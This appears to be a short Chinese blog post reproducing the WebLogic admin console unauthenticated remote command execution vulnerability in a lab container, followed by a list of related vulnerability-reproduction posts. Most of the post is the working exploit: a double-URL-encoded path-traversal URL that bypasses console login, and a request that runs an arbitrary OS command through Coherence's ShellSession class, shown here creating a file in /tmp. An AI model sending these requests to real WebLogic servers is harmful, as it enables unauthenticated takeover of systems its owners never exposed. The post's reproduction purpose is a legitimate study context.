weblogic管理控制台未授权远程命令执行漏洞复现

诗尚凝寒

 关注

阅读 50

2022-04-14

ip:/console进入登录页面

然后我们输入

ip:7001/console/css/%252e%252e%252fconsole.portal进行登陆绕过

然后我们进行访问

http://ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/txt');")

利用com.tangosol.coherence.mvel2.sh.ShellSession执行命令

 

我们看到页面回显404,进入环境漏洞容器中查看文件是否被建立

可以看到文件已经被成功建立

 

相关推荐

weblogic管理控制台未授权远程命令执行漏洞

年夜雪 50 0 0

MongoDB 未授权访问漏洞复现

亿奇学 50 0 0

Webmin远程命令执行漏洞复现报告

左手梦圆 34 0 0

Apache SSI 远程命令执行漏洞复现

谁知我新 126 0 0

zookeeper未授权漏洞复现及处理

Android开发指南 47 0 0

weblogic漏洞复现

RJ_Hwang 107 0 0

python执行控制台命令工具类

西风白羽 47 0 0

漏洞复现(vulhub漏洞复现) weblogic 文件读取漏洞

何以至千里 71 0 0

【漏洞复现】Smanga未授权远程代码执行漏洞(CVE-2023-36076) 附加SQL注入+任意文件读取

木樨点点 36 0 0

Rsync未授权访问漏洞复现及彻底修复

玉字璧 21 0 0

精彩评论(0)

0 0 举报